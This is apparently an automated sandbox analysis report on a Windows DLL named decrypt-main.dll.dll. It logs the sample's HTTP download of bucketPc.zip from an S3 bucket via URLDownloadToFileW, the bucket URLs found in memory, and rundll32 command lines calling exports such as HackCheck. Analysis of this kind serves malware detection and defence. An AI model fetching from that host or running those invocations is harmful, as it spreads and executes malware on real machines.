Windows Analysis Report
decrypt-main.dll.dll

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /bucketPc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00815B40 Sleep,SleepEx,URLDownloadToFileW,Sleep,

3_2_00815B40

Source: global traffic

Source: unknown

DNS traffic detected: queries for: bucreate203920233.s3.sa-east-1.amazonaws.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not Foundx-amz-request-id: TKB5CKH123017SA6x-amz-id-2: aTk7n8ul0eLKfek03zQ+rqk8WoPYFkzu5x5+WZ+osLOxsf8k/+vYXVouPUpp2T94AENI8+MgxYY=Content-Type: application/xmlTransfer-Encoding: chunkedDate: Wed, 13 Mar 2024 15:50:59 GMTServer: AmazonS3Connection: close

Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: rundll32.exe, rundll32.exe, 00000011.00000002.1839230847.0000000000428000.00000020.00000001.01000000.00000003.sdmp, decrypt-main.dll.dll	String found in binary or memory: http://www.delphiforfun.org/
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/:
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/R
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836201248.000001B719F70000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836690410.000001B71BA3F000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1838394731.000001B71C05B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipJ
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipqJ
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zipx7E
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bucreate203920233.s3.sa-east-1.amazonaws.com/bucketPc.zip~K
Source: rundll32.exe, 00000003.00000002.1836201248.000001B719FD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com

Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729

Source: unknown

HTTPS traffic detected: 16.12.1.62:443 -> 192.168.2.4:49729 version: TLS 1.2

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00414B50	3_2_00414B50
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00438220	3_2_00438220
Source: C:\Windows\System32\rundll32.exe	Code function: 10_2_00414B50	10_2_00414B50
Source: C:\Windows\System32\rundll32.exe	Code function: 10_2_00438220	10_2_00438220
Source: C:\Windows\System32\rundll32.exe	Code function: 14_2_00414B50	14_2_00414B50
Source: C:\Windows\System32\rundll32.exe	Code function: 14_2_00438220	14_2_00438220
Source: C:\Windows\System32\rundll32.exe	Code function: 15_2_00414B50	15_2_00414B50
Source: C:\Windows\System32\rundll32.exe	Code function: 15_2_00438220	15_2_00438220

Source: C:\Windows\System32\rundll32.exe

Code function: String function: 004208C0 appears 96 times

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 476

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: classification engine

Classification label: mal56.evad.winDLL@26/17@1/1

Source: C:\Windows\System32\rundll32.exe

File created: C:\Program Files\Classic Shell

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8068
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7532
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7516
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\cc51e6fa-75b0-49f4-8ca7-6b61f342595a

Source: decrypt-main.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck

Source: decrypt-main.dll.dll

ReversingLabs: Detection: 62%

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\decrypt-main.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 476
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7516 -s 2004
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7924 -s 448
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8068 -s 472
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,HackCheck	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,ServiceCrtMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\decrypt-main.dll.dll,TMethodImplementationIntercept	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",HackCheck	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",ServiceCrtMain	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",TMethodImplementationIntercept	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",dbkFCallWrapperAddr	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",__dbk_fcall_wrapper	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\decrypt-main.dll.dll",#1	Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\rundll32.exe	Directory created: C:\Program Files\Classic Shell			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Directory created: C:\Program Files\Classic Shell\cache			Jump to behavior

Source: decrypt-main.dll.dll

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: decrypt-main.dll.dll

Static file information: File size 5330944 > 1048576

Source: decrypt-main.dll.dll

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x424000

Source: decrypt-main.dll.dll

Static PE information: section name: .didata

Source: C:\Windows\System32\rundll32.exe

Code function: 14_2_0088E638 push rax; ret

14_2_0088E661

Source: C:\Windows\System32\loaddll64.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
